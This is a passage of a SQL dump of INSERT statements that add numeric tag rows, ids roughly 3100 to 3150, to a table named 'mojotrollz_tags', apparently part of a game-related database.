`mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3100, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3100, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3101, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3101, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3101, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3101, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3101, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3101, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3102, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3102, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3102, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3102, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3102, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3102, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3103, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3103, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3103, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3103, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3103, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3103, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3104, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3104, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3104, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3104, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3104, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3104, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3105, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3105, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3106, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3106, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3106, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3106, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3106, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3106, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3107, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3107, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3107, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3107, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3107, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3107, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3108, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3108, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3108, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3108, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3108, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3108, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3110, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3110, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3110, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3110, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3110, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3110, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3111, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3111, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3111, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3111, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3111, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3111, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3112, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3112, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3112, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3112, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3112, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3112, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3113, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3113, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3113, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3113, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3113, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3113, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3114, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3114, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3114, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3114, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3114, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3114, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3115, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3115, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3115, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3115, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3115, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3115, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3116, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3116, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3116, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3116, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3116, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3116, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3117, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3117, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3117, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3117, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3117, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3117, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3118, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3118, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3118, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3118, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3118, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3118, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3119, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3119, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3119, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3119, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3119, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3119, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3120, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3120, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3120, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3120, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3120, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3120, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3121, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3121, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3121, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3121, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3121, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3121, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3122, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3122, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3122, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3122, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3122, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3122, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3123, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3123, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3123, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3123, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3123, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3123, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3124, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3124, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3124, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3124, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3124, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3124, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3125, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3125, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3125, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3125, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3125, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3125, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3126, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3126, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3126, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3126, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3126, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3126, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3127, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3127, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3127, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3127, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3127, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3127, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3128, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3128, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3128, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3128, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3128, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3128, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3129, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3129, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3129, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3129, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3129, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3129, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3130, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3130, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3130, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3130, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3130, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3130, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3131, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3131, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3131, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3131, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3131, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3131, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3133, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3133, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3134, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3134, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3135, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3135, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3136, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3136, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3137, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3137, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3138, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3138, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3139, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3139, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3139, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3139, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3139, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3139, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3140, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3140, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3140, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3140, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3140, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3140, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3141, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3141, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3142, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3142, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3142, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3142, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3142, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3142, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3143, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3143, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3143, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3143, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3143, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3143, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3144, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3144, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3144, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3144, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3144, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3144, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3145, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3145, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3145, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3145, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3145, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3145, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3147, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3147, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3147, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3147, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3147, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3147, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3149, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3149, 1, 2, 33, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3149, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3149, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3149, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3150, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3150, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3150, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3150, 1, 10, 1, 